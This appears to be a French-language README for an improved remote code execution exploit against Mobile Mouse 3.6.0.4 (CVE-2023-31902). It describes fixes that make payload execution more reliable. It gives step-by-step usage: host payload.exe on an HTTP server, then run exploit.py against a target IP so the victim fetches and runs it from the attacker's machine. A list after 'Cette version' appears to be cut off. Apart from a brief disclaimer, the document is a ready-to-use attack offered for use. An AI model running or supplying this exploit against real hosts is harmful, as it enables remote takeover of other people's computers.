
Mobile Mouse 3.6.0.4 - Exécution de code à distance - CVE-2023-31902
Une version corrigée de l'exploit d'exécution de code à distance Mobile Mouse 3.6.0.4 publié sous la référence EDB-51010.
L'exploit d'origine télécharge avec succès la charge utile mais peut échouer à l'exécuter, car les deux étapes utilisent la même connexion TCP.
Cette version :
Elle utilise également sendall(), des chemins Windows correctement échappés, des délais d'attente de socket et une gestion de base des erreurs.
Démarrez un serveur HTTP dans le répertoire de la charge utile :
python3 -m http.server 8080
Exécutez l'exploit :
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
Ce projet est destiné uniquement aux tests de sécurité autorisés et à la recherche éducative. Ne l'utilisez pas contre des systèmes sans autorisation explicite.